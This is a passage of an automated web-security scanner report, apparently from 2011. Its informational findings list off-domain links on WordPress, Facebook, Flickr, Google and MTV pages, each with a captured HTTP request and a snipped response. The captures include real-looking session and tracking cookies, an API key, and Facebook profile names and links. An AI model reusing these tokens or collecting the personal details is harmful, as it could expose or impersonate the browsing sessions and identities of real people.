<h2>Object moved to <a href="http://community.mtv.com/Overlays/LogIn.aspx?callbackName=F13080112111260&amp;fluxHosted=false&amp;fbAutoLoginDisabled=true&amp;domain=www.mtv.com&amp;authCookie=">here</a>
...[SNIP]...
18.55. http://wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wordpress.com
Path:   /signup/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /signup/?ref=bottomtext HTTP/1.1
Host: wordpress.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D; TESTCOOKIE=home

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 14 Jun 2011 00:33:45 GMT
Content-Type: text/html
Connection: close
Location: http://en.wordpress.com/signup/?ref=bottomtext
Content-Length: 414

<html>
<head><title> 301 Moved Permanently
</title></head>
<body><h1> 301 Moved Permanently
</h1>
The document has been permanently moved to <A HREF="%s">here</A>.<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Server</a>
...[SNIP]...
18.56. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/fan.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&connections=10&height=250&id=8304333127&locale=en_US&sdk=joey&stream=false&width=377 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.55
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 11488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/XdqqM7LeZ4W.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/y4c155TFG-h.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/xfp-ll5tNb2.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/OJBsowkZPti.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/AkVjWVFFdhX.js"></script>
...[SNIP]...
<a href="http://www.facebook.com/wsjonline" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203544_8304333127_7475373_q.jpg" alt="The Wall Street Journal" /></a>
...[SNIP]...
<a href="" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yo/r/UlIqmHJn-SK.gif" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/bikram.barooah" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195538_804285182_2453845_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/161497_533976603_2846184_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/evan.c.jones" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/195349_100000059670679_1310414_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100002154783289" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/187192_100002154783289_4068751_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/profile.php?id=100001394749859" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/211924_100001394749859_1440570_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/41466_1438260575_7903_q.jpg" alt="" /><div class="name">
...[SNIP]...
<a href="http://www.facebook.com/lorraine.santos" target="_blank"><img class="img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/203218_1309484694_5383362_q.jpg" alt="" /><div class="name">
...[SNIP]...
18.57. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df337b746ac%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff1cdbf0e3c%26relation%3Dparent.parent%26transport%3Dpostmessage&href=http%3A%2F%2Fonline.wsj.com%2Farticle%2FSB10001424052702304665904576383880754844512.html%3Fmod%3DWSJ_Tech_LEADTop&layout=standard&locale=en_US&node_type=link&sdk=joey&send=true&show_faces=true&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052702304665904576383880754844512.html?mod=WSJ_Tech_LEADTop
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.32
X-Cnection: close
Date: Tue, 14 Jun 2011 00:14:20 GMT
Content-Length: 8896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/SqDoi07-B2a.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/a8-71wQDIx3.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/eptfJSfAjrr.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/Ou0QNrclV2b.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js"></script>
...[SNIP]...
18.58. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www150.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r09.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r14.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62864.18"></script>
...[SNIP]...
<body>
<img src="http://geo.yahoo.com/p?s=792600103&t=62506aca6cbf096ebf1c3fc8f55f29cc&r=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /><script type="text/javascript">
...[SNIP]...
18.59. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/category/general/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:26:40 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www107.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 3486
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62864.18"></script>
...[SNIP]...
<body>
<img src="http://geo.yahoo.com/p?s=792600103&t=6071d6fb48a8dc26a7fba77946ea9612&r=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fcategory%2Fgeneral%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /><script type="text/javascript">
...[SNIP]...
18.60. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/downloads/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:27:24 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www44.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Length: 3477
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62864.18"></script>
...[SNIP]...
<body>
<img src="http://geo.yahoo.com/p?s=792600103&t=14822bffd52e52c69ece2fcaedba4641&r=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2Fdownloads%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /><script type="text/javascript">
...[SNIP]...
18.61. http://www.flickr.com/fragment.gne  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /fragment.gne

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /fragment.gne?name=inc_language_selector HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:13 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:13 GMT; path=/; domain=.flickr.com
X-Served-By: www116.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r21.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r22.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 1481

       <ul>
           <li><a href="/change_language.gne?lang=zh-hk&magic_cookie=627772737f8cc7615c9c893fe0d08b9d" class="image_link" id="lang_zh-hk"><img src="http://l.yimg.com/g/images/spaceout.gif" width="45" height="13" id="langselect_zh-hk" alt="............"></a>
...[SNIP]...
<a href="/change_language.gne?lang=ko-kr&magic_cookie=627772737f8cc7615c9c893fe0d08b9d" class="image_link" id="lang_ko-kr"><img src="http://l.yimg.com/g/images/spaceout.gif" width="23" height="13" id="langselect_ko-kr" alt="......"></a>
...[SNIP]...
18.62. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?hl=en&q=Chordiant+Software HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=47=lorCzpeeruyCsbBVsWEMMq0Dn_FEZO2YvQlh5PbRyvyK-EGYzmwzyA_2p0yLU1EIOsGj5P7ltQDj-N2Ero7RzOq6NjJuFZs5xUAH3SXWEGgb9bkdrXqd248wCK5T3lcc

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:27:45 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/vD843DpA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 93684

<!doctype html> <head> <title>Chordiant Software - Google Search</title> <script>window.google={kEI:"wVP3TeHzHsL10gHSu8GOCw",kEXPI:"17259,23756,24692,24878,24879,27400,28505,29689,29702,29795,2
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&q=Chordiant+Software&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.pega.com/" class=l onmousedown="return clk(this.href,'','','','1','','0CCAQFjAA')">Business Process Management (BPM) and Customer Relationship <b>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Wy5YoZeIRMAJ:www.pega.com/+Chordiant+Software&amp;cd=1&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CCUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pega.com/about-us/careers" onmousedown="return clk(this.href,'','','','1','','0CCgQqwMoADAA')">Careers</a></div><div class=sld><a class=sla href="http://www.pega.com/about-us/contact-us" onmousedown="return clk(this.href,'','','','1','','0CCkQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pega.com/about-us" onmousedown="return clk(this.href,'','','','1','','0CCoQqwMoAjAA')">About Pegasystems</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pega.com/products" onmousedown="return clk(this.href,'','','','1','','0CCsQqwMoAzAA')">Products</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pega.com/products/business-process-management" onmousedown="return clk(this.href,'','','','1','','0CCwQqwMoBDAA')">BPM</a></div><div class=sld><a class=sla href="http://www.pega.com/about-us/company/management-team" onmousedown="return clk(this.href,'','','','1','','0CC0QqwMoBTAA')">Management Team</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.pega.com/about-us/company" onmousedown="return clk(this.href,'','','','1','','0CC4QqwMoBjAA')">Company</a></div><div class=sld><a class=sla href="http://www.pega.com/products/decision-management/business-rules" onmousedown="return clk(this.href,'','','','1','','0CC8QqwMoBzAA')">Business Rules</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Chordiant" class=l onmousedown="return clk(this.href,'','','','2','','0CDIQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:pknAv71rUPAJ:en.wikipedia.org/wiki/Chordiant+Chordiant+Software&amp;cd=2&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CDcQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.reuters.com/article/2010/03/15/chordiant-takeover-pegasystems-idUSSGE62E0S620100315" class=l onmousedown="return clk(this.href,'','','','3','','0CDkQFjAC')">UPDATE 2-Pegasystems to buy <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:S4t5f1-kc7oJ:www.reuters.com/article/2010/03/15/chordiant-takeover-pegasystems-idUSSGE62E0S620100315+Chordiant+Software&amp;cd=3&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CD4QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://seekingalpha.com/article/181756-chordiant-software-from-hunter-to-hunted" class=l onmousedown="return clk(this.href,'','','','4','','0CD8QFjAD')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:e1BJB69eV2kJ:seekingalpha.com/article/181756-chordiant-software-from-hunter-to-hunted+Chordiant+Software&amp;cd=4&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CEQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://topics.nytimes.com/top/news/business/companies/chordiant-software-inc/index.html" class=l onmousedown="return clk(this.href,'','','','5','','0CEYQFjAE')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:zebUv_nhKfcJ:topics.nytimes.com/top/news/business/companies/chordiant-software-inc/index.html+Chordiant+Software&amp;cd=5&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CE8QIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jivesoftware.com/customers/case-studies" class=l onmousedown="return clk(this.href,'','','','6','','0CFEQFjAF')">Customer Case Studies - Jive <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:380dfjHLtdgJ:www.jivesoftware.com/customers/case-studies+Chordiant+Software&amp;cd=6&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CFYQIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://investing.businessweek.com/research/stocks/snapshot/snapshot.asp?capId=26457" class=l onmousedown="return clk(this.href,'','','','7','','0CFgQFjAG')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:qo9Zkc3rL2cJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D26457+Chordiant+Software&amp;cd=7&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk('http://webcache.googleusercontent.com/search?q=cache:qo9Zkc3rL2cJ:investing.businessweek.com/research/stocks/snapshot/snapshot.asp%3FcapId%3D26457+Chordiant+Software&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com','','','','7','','0CF0QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.hoovers.com/company/Chordiant_Software_Inc/ssyjif-1.html" class=l onmousedown="return clk(this.href,'','','','8','','0CF4QFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:oZnuvusU_ZIJ:www.hoovers.com/company/Chordiant_Software_Inc/ssyjif-1.html+Chordiant+Software&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CGMQIDAH')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=Ro8R5d0jkwk" class=l onmousedown="return clk(this.href,'','5084302183279858441','','9','','0CGUQtwIwCA')">YouTube - <em>
...[SNIP]...
<h3 class="r"><a href="http://www.foxbusiness.com/story/markets/industries/technology/cdc-software-seeks-acquisition-chordiant-software/" class=l onmousedown="return clk(this.href,'','','','10','','0CG0QFjAJ')">CDC Software Buying <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:W9NmoeJ_GlAJ:www.foxbusiness.com/story/markets/industries/technology/cdc-software-seeks-acquisition-chordiant-software/+Chordiant+Software&amp;cd=10&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return clk(this.href,'','','','10','','0CHIQIDAJ')">Cached</a>
...[SNIP]...
<div><a href="http://www.appian.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CHQQoggwCg')">Appian</a>
...[SNIP]...
<div><a href="http://www.metastorm.com/" class=l onmousedown="return clk(this.href,'','','','12','','0CHYQoggwCw')">Metastorm</a>
...[SNIP]...
<div><a href="http://www.tibco.com/" class=l onmousedown="return clk(this.href,'','','','13','','0CHgQoggwDA')">Tibco</a>
...[SNIP]...
<div><a href="http://www.global360.com/" class=l onmousedown="return clk(this.href,'','','','14','','0CHoQoggwDQ')">Global360</a>
...[SNIP]...
18.63. http://www.mtv.com/games/arcade/game/play.jhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /games/arcade/game/play.jhtml

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /games/arcade/game/play.jhtml?arcadeGameId=10325912 HTTP/1.1
Host: www.mtv.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; s_nr=1307963913916; ak-mobile-detected=no; projxcookie=yes; qcDemo=demo%253DD%253Bdemo%253DT%253Bdemo%253D5840%253Bdemo%253D2966%253Bdemo%253D2907%253Bdemo%253D2905%253Bdemo%253D2904%253Bdemo%253D1607%253Bdemo%253D1299%253Bdemo%253D850%253Bdemo%253D848%253Bdemo%253D844%253Bdemo%253D827%253Bdemo%253D790%253Bdemo%253D777%253Bdemo%253D775%253Bdemo%253D774; s_ppv=62; mbox=session#1308010496673-477284#1308012600|check#true#1308010800; __cs_rr=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Type: text/html
ETag: de3234c31aebd5a0514286e2152d9433
Vary: Accept-Encoding
Cache-Control: max-age=591
Date: Tue, 14 Jun 2011 00:19:23 GMT
Content-Length: 18059
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<l
...[SNIP]...
</script>

<script type="text/javascript" src="http://games.mtvnservices.com/scripts/mtvngameloader.1.0.2.js"></script>
...[SNIP]...
<li>
<a href="http://www.mtviggy.com/">MTV Iggy</a>
</li>
<li>
<a href="http://www.getschooled.com/">Get Schooled</a>
...[SNIP]...
<li>
<a href="http://www.facebook.com/MTV">MTV On Facebook</a>
...[SNIP]...
<li>
<a href="http://twitter.com/MTV">MTV On Twitter</a>
...[SNIP]...
<li>
<a href="http://www.myspace.com/mtv">MTV On MySpace</a>
...[SNIP]...
<li>
